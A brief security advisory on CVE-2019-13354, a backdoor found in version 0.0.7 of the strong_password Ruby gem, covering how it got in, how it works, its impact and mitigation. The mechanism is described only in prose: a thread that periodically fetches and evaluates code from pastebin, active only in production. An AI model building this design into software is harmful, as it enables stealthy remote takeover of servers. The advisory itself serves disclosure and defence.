CVE-2019-13354

Vulnerability

Details

The strong_password gem version 0.0.7, distributed on RubyGems.org, included a malicious backdoor injected by a third party who gained access to the gem's publishing credentials. The legitimate source code in the GitHub repository had not been updated; the backdoor existed only in the package published on RubyGems. The backdoor was appended to the lib/strong_password/strength_checker.rb file and consisted of obfuscated code that executed a remote code payload [2][3].

Exploitation

Mechanism

The backdoor code creates a new Ruby thread that, on an infinite loop, sleeps for a random period of up to about an hour and then fetches and evaluates Ruby code from a pastebin.com URL using Net::HTTP.get. The malicious code runs only when Rails.env[0] == "p", which is true for a production environment (Rails.env starts with 'p'). This means the exploit activates only in production Rails applications, making it stealthier and more dangerous [3].

Impact and

Consequences

If successfully exploited, an attacker could remotely execute arbitrary Ruby code on the server running the vulnerable gem. This could lead to full server compromise, data exfiltration, credential theft, or further lateral movement within the infrastructure. The payload source was external (pastebin), allowing the attacker to change the payload at any time without updating the gem [3][4].

Mitigation

Status

Users should immediately upgrade to the latest clean version of the gem (0.0.9 or later) or downgrade to version 0.0.6, which does not contain the backdoor. The malicious version 0.0.7 has been removed from RubyGems.org. No other versions of the gem were compromised [1][2][3].